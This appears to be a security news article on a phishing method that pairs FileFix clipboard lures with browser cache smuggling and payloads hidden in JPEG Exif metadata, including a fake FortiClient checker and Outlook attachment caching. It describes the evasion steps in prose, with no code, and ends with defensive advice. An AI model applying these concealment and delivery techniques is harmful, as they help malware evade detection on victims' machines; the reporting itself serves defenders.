Cybersecurity researchers have uncovered a sophisticated evolution in phishing attacks that combines FileFix social engineering with cache smuggling techniques to bypass modern security defenses.
This hybrid attack method eliminates the need for malicious code to make web requests, instead extracting payloads directly from the browser’s cache where they were planted through cache smuggling.
The technique represents a significant advancement in adversarial tactics, as it evades security controls that focus primarily on monitoring and restricting untrusted code’s ability to access the internet.
The attack builds upon the established ClickFix methodology, where threat actors create fake CAPTCHA prompts that social engineer victims into executing malicious commands.
These phishing lures typically instruct users to press Windows key + R to open the Run dialog, followed by Ctrl + V to paste clipboard content, and Enter to execute.
Behind the scenes, JavaScript on the malicious webpage has already populated the victim’s clipboard with harmful commands.
However, the Run dialog’s 260-character limit severely restricts the complexity of attacks, forcing adversaries to rely on easily-detected PowerShell or MSHTA downloaders.
FileFix emerged as a solution to this limitation by redirecting victims to paste malicious commands into Windows Explorer’s address bar instead, which supports up to 2,048 characters.
This expanded capacity allows threat actors to hide their actual commands using extensive padding with spaces, displaying only benign-looking file paths to unsuspecting users.
A recently observed campaign masqueraded as a FortiClient Compliance Checker, leveraging JavaScript to automatically open Windows Explorer and guide victims through the attack sequence.
Weaponizing Browser Functionality
The critical innovation in this attack merges FileFix with cache smuggling, a technique that exploits how web browsers store static assets like CSS, JavaScript, and image files.
To demonstrate this, I put together a basic proof-of-concept phishing page which conceals a “Hello World” DLL inside the Exif data of the page logo.
By manipulating HTTP Content-Type headers, attackers can force browsers to cache arbitrary file types—including executable files—by disguising them as legitimate image files.
In the FortiClient campaign, malicious JavaScript used the fetch() function to retrieve a fake JPEG file that was actually a ZIP archive containing malware.
The PowerShell payload then searches the browser’s cache directory for the ZIP file, extracts the malicious code, and executes it—all without making any network connections that would typically trigger alerts from endpoint detection and response systems or firewalls.
This approach circumvents security layers designed to monitor and block suspicious outbound connections from untrusted scripts.
Researchers have developed an even more sophisticated variant using Exif metadata smuggling in JPEG images.
The Exchangeable Image File Format supports up to 64KB of metadata, with individual fields capable of utilizing the entire space.
By exploiting how text parsers handle null bytes in ASCII strings, attackers can conceal payloads within standard Exif fields like “Image Description” while maintaining the image’s validity and avoiding detection by most Exif parsers.
The technique embeds encrypted payloads between delimiter tags within the Exif data, which PowerShell scripts can extract using regular expressions without requiring a full Exif parser.
This method produces legitimate JPEG images that display normally and pass cursory inspection, while secretly carrying malicious code. The payload never appears in its raw form on disk until decryption, significantly reducing the likelihood of antivirus detection during on-access scans.
Security Implications
The Exif smuggling technique extends beyond web browsers to email clients. Testing revealed that Microsoft Outlook preemptively caches and downloads image attachments even when image previewing is disabled, and crucially, does not strip Exif metadata.
This means attackers can deliver second-stage payloads onto target systems simply by sending an email with a specially crafted JPEG attachment—potentially without the victim even opening the message.
This development challenges fundamental assumptions in security monitoring. Traditional defenses rely on detecting malicious scripts either embedding payloads directly or performing web requests to fetch them.
When payloads are pre-smuggled through legitimate caching mechanisms, these controls become ineffective.
The technique also enables the creation of command-and-control-less loaders that monitor software cache directories for files containing predetermined signatures, eliminating network indicators of compromise entirely.
Security vendors must adapt their detection strategies to account for scenarios where second-stage payloads arrive through passive caching mechanisms rather than active downloads.
Organizations should consider implementing controls that strip metadata from cached files, monitor for unusual access patterns to browser cache directories, and deploy behavioral analytics that can identify suspicious script activity even in the absence of network connections.
As threat actors continue innovating around established security controls, defenders must expand their visibility beyond traditional network-based indicators to maintain effective protection.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
